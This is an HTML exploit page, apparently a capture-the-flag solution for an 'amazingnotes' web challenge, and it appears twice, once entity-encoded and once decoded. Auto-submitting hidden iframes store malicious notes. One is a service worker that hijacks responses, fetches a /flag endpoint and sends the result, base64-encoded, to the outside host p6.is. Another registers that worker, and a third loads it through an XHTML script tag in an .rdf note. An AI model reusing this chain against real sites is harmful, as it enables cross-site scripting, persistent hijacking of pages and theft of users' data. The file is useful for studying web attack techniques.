po6ix/ex.html

## ex.html
<iframe srcdoc="&#x3C;form action=&#x22;https://amazingnotes.asisctf.com:444/&#x22; method=&#x22;POST&#x22; id=x&#x3E;
&#x3C;input name=ext value=es&#x3E;
&#x3C;textarea name=note&#x3E;
self.addEventListener(&#x22;fetch&#x22;, function(event) {
if(event.request.url.indexOf(&#x22;flag&#x22;) != -1)
    return;
event.respondWith(new Response(&#x60;

&#x3C;img src=//p6.is/givemeflag&#x3E;
<script>
fetch('/flag', {method:'POST', headers: {&#x22;X-I-Want&#x22;: &#x22;flag&#x22;}})
.then(x=>x.text())
.then(x=>{
    location = '//p6.is/theflag?'+btoa(x)
})
.catch(x=>{
    location = '//p6.is/theerrorflag?'+btoa(x)
})
</script>

&#x60;, {
    headers: {&#x22;Content-Type&#x22;: &#x22;text/html&#x22;}
}));
});
&#x3C;/textarea&#x3E;
&#x3C;script&#x3E;
x.submit()
&#x3C;/script&#x3E;
&#x3C;/form&#x3E;"></iframe>

<iframe srcdoc="&#x3C;form action=&#x22;https://amazingnotes.asisctf.com:444/&#x22; method=&#x22;POST&#x22; id=x&#x3E;
&#x3C;input name=ext value=es&#x3E;
&#x3C;textarea name=note&#x3E;
try {
navigator.serviceWorker.register(&#x22;/note/a4e806bcda3adca0d4b78d5066b84dc2.es&#x22;, {
&#x9;scope: &#x22;/note/&#x22;
}).then(function(reg) {
    setTimeout(() => {
    location = &#x22;https://amazingnotes.asisctf.com:444/note/xxx.es&#x22;;
    }, 500);
}).catch(function(e) {
&#x9;location = &#x22;https://p6.is/error?&#x22; + e;
});
} catch(e) {&#x9;location = &#x22;https://p6.is/error?&#x22; + e;}
&#x3C;/textarea&#x3E;
&#x3C;script&#x3E;
x.submit()
&#x3C;/script&#x3E;
&#x3C;/form&#x3E;"></iframe>

<iframe srcdoc="&#x3C;form action=&#x22;https://amazingnotes.asisctf.com:444/&#x22; method=&#x22;POST&#x22; id=x&#x3E;
&#x3C;input name=ext value=rdf&#x3E;
&#x3C;textarea name=note&#x3E;
&#x3C;x:script xmlns:x=&#x22;http://www.w3.org/1999/xhtml&#x22; src=&#x22;/note/15b27a18b1c0acf70f33cf8f73400cc0.es&#x22;&#x3E;&#x3C;/x:script&#x3E;
&#x3C;/textarea&#x3E;
&#x3C;script&#x3E;
x.submit()
&#x3C;/script&#x3E;
&#x3C;/form&#x3E;"></iframe>

<script>
setTimeout(() => {
location = 'https://amazingnotes.asisctf.com:444/note/ba8cfa7a9f18d67b96d1849dd7626b9f.rdf';
}, 500);
</script>
	<iframe srcdoc="<form action="https://amazingnotes.asisctf.com:444/" method="POST" id=x>
	<input name=ext value=es>
	<textarea name=note>
	self.addEventListener("fetch", function(event) {
	if(event.request.url.indexOf("flag") != -1)
	return;
	event.respondWith(new Response(`

	<img src=//p6.is/givemeflag>
	<script>
	fetch('/flag', {method:'POST', headers: {"X-I-Want": "flag"}})
	.then(x=>x.text())
	.then(x=>{
	location = '//p6.is/theflag?'+btoa(x)
	})
	.catch(x=>{
	location = '//p6.is/theerrorflag?'+btoa(x)
	})
	</script>

	`, {
	headers: {"Content-Type": "text/html"}
	}));
	});
	</textarea>
	<script>
	x.submit()
	</script>
	</form>"></iframe>

	<iframe srcdoc="<form action="https://amazingnotes.asisctf.com:444/" method="POST" id=x>
	<input name=ext value=es>
	<textarea name=note>
	try {
	navigator.serviceWorker.register("/note/a4e806bcda3adca0d4b78d5066b84dc2.es", {
	scope: "/note/"
	}).then(function(reg) {
	setTimeout(() => {
	location = "https://amazingnotes.asisctf.com:444/note/xxx.es";
	}, 500);
	}).catch(function(e) {
	location = "https://p6.is/error?" + e;
	});
	} catch(e) { location = "https://p6.is/error?" + e;}
	</textarea>
	<script>
	x.submit()
	</script>
	</form>"></iframe>

	<iframe srcdoc="<form action="https://amazingnotes.asisctf.com:444/" method="POST" id=x>
	<input name=ext value=rdf>
	<textarea name=note>
	<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="/note/15b27a18b1c0acf70f33cf8f73400cc0.es"></x:script>
	</textarea>
	<script>
	x.submit()
	</script>
	</form>"></iframe>

	<script>
	setTimeout(() => {
	location = 'https://amazingnotes.asisctf.com:444/note/ba8cfa7a9f18d67b96d1849dd7626b9f.rdf';
	}, 500);
	</script>